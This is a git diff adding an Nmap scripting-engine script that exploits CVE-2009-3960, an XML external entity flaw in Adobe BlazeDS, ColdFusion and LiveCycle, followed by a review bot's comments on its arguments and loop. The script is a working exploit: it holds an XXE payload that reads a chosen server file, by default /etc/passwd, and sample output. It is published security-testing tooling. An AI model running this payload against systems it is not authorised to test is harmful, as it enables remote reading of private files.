Diffstat (limited to 'scripts/http-vuln-cve2009-3960.nse')
-rw-r--r--scripts/http-vuln-cve2009-3960.nse163
1 files changed, 163 insertions, 0 deletions
diff --git a/scripts/http-vuln-cve2009-3960.nse b/scripts/http-vuln-cve2009-3960.nse
new file mode 100644
index 0000000..38c1e9d
--- /dev/null
+++ b/scripts/http-vuln-cve2009-3960.nse
@@ -0,0 +1,163 @@
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local table = require "table"
+local vulns = require "vulns"
+
+description = [[
+Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.
+
+This vulnerability permits to read local files remotely and is present in
+BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data
+Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
+ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0
+
+For more information see:
+* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+* https://www.securityfocus.com/bid/38197
+* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
+]]
+
+---
+-- @see http-adobe-coldfusion-apsa1301.nse
+-- @see http-coldfusion-subzero.nse
+-- @see http-vuln-cve2010-2861.nse
+--
+-- @args http-vuln-cve2009-3960.root Points to the root path. Defaults to "/"
+-- @args http-vuln-cve2009-3960.readfile target file to be read. Defaults to "/etc/passwd"
+--
+-- @usage
+-- nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>
+--
+--@output
+-- PORT STATE SERVICE
+-- 80/tcp open http
+--| http-vuln-cve2009-3960:
+--| samples/messagebroker/http
+--| <?xml version="1.0" encoding="utf-8"?>
+--| <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
+--| bin:*:1:1:bin:/bin:/sbin/nologin
+--| daemon:*:2:2:daemon:/sbin:/sbin/nologin
+--| adm:*:3:4:adm:/var/adm:/sbin/nologin
+--| lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
+--| sync:*:5:0:sync:/sbin:/bin/sync
+--| shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
+--| halt:*:7:0:halt:/sbin:/sbin/halt
+--| mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
+--| news:*:9:13:news:/etc/news:
+--| uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
+--| operator:*:11:0:operator:/root:/sbin/nologin
+--| games:*:12:100:games:/usr/games:/sbin/nologin
+--| gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
+--| ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
+--| nobody:*:99:99:Nobody:/:/sbin/nologin
+--| nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
+--| vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
+--| pcap:!!:77:77::/var/arpwatch:/sbin/nologin
+--| mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
+--| ...
+--|_
+
+author = "Hani Benhabiles"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"exploit", "intrusive", "vuln"}
+
+
+portrule = shortport.http
+
+action = function(host, port)
+ -- Matching returned response body to confirm vulnerability
+ local matchstart = '<?xml version="1.0" encoding="utf-8"?>'
+ local matchend = '</string><null/></object></body></amfx>'
+ local matchsize = 120
+ local matchnotvuln = '<string>External entities are not allowed</string>'
+
+ local results = {}
+ local root = stdnse.get_script_args(SCRIPT_NAME .. ".root") or "/"
+ local readfile = stdnse.get_script_args(SCRIPT_NAME .. ".readfile") or "/etc/passwd"
+
+ local paths = {
+ "messagebroker/http",
+ "messagebroker/httpsecure",
+
+ -- Coldfusion
+ "flex2gateway/http",
+ "flex2gateway/httpsecure",
+
+ -- BlazeDS
+ "blazeds/messagebroker/http",
+ "blazeds/messagebroker/httpsecure",
+ "samples/messagebroker/http",
+ "samples/messagebroker/httpsecure",
+
+ -- LiveCycle Data Services
+ "lcds/messagebroker/http",
+ "lcds/messagebroker/httpsecure",
+ "lcds-samples/messagebroker/http",
+ "lcds-samples/messagebroker/httpsecure",
+ }
+
+ local exploit = [[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test
+ [ <!ENTITY x3 SYSTEM "]].. readfile
+ .. [["> ]><amfx ver="3"
+ xmlns="http://www.macromedia.com/2005/amfx"><body>
+ <object type="flex.messaging.messages.CommandMessage">
+ <traits><string>body</string><string>clientId</string>
+ <string>correlationId</string><string>destination</string>
+ <string>headers</string><string>messageId</string><string>
+ operation</string><string>timestamp</string><string>timeToLive
+ </string></traits><object><traits /></object><null /><string />
+ <string /><object><traits><string>DSId</string><string>
+ DSMessagingVersion</string></traits><string>nil</string>
+ <int>1</int></object><string>&x3;</string><int>5</int>
+ <int>0</int><int>0</int></object></body></amfx>]]
+
+
+ local options = {header={["Content-Type"]="application/x-amf"}}
+ local path
+
+ local http_vuln = {
+ title = "Adobe XML External Entity Injection",
+ IDS = {CVE = 'CVE-2009-3960'},
+ risk_factor = "High",
+ scores = {
+ CVSSv2 = "4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:N/A:N)",
+ },
+ description = [[
+Permits to read local files remotely and is present in
+BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data
+Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
+ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0]],
+ references = {
+ 'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf',
+ 'https://www.securityfocus.com/bid/38197'
+ },
+ dates = {
+ disclosure = {year = '2010', month = '02', day = '15'},
+ },
+ exploit_results = {},
+ }
+
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ http_vuln.state = vulns.STATE.NOT_VULN
+
+ for _,path in pairs(paths) do
+ local uri = root .. path
+ local response = http.post(host, port, uri, options, nil, exploit)
+
+ if response.status == 200 then
+ if #response.body >= matchsize and
+ string.sub(response.body,1,string.len(matchstart))==matchstart and
+ string.sub(response.body,-string.len(matchend))==matchend and
+ string.match(response.body, matchnotvuln)==nil
+ then
+ table.insert(results, {'File: ' .. readfile .. ' extracted via ' .. path .. '\n\n',{response.body}})
+ http_vuln.extra_info = stdnse.format_output(true, results)
+ http_vuln.state = vulns.STATE.EXPLOIT
+ end
+ end
+ end
+
+ return report:make_output(http_vuln)
+end
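Review bot: The @usage example names the argument `http-http-vuln-cve2009-3960.root`, but the script reads `SCRIPT_NAME .. ".root"`, i.e. `http-vuln-cve2009-3960.root`, so the documented command does nothing; change it to `-- nmap --script=http-vuln-cve2009-3960 --script-args http-vuln-cve2009-3960.root="/root/" <target>`. The `local path` declared right after `options` is never used, because `for _,path in pairs(paths)` introduces its own local, so the declaration should be dropped; and since the order in which the endpoints are probed is part of the intended behaviour (the comments group them by product), iterate with `for _, path in ipairs(paths) do` rather than relying on the unspecified `pairs` order. `risk_factor = "High"` sits next to a CVSSv2 score labelled MEDIUM; either reconcile the two or add a comment explaining why the script rates the issue higher than the score. Because `root` is concatenated directly with each path (`local uri = root .. path`), the `@args` line for `.root` should state that the value must end with a `/`, as the example value does.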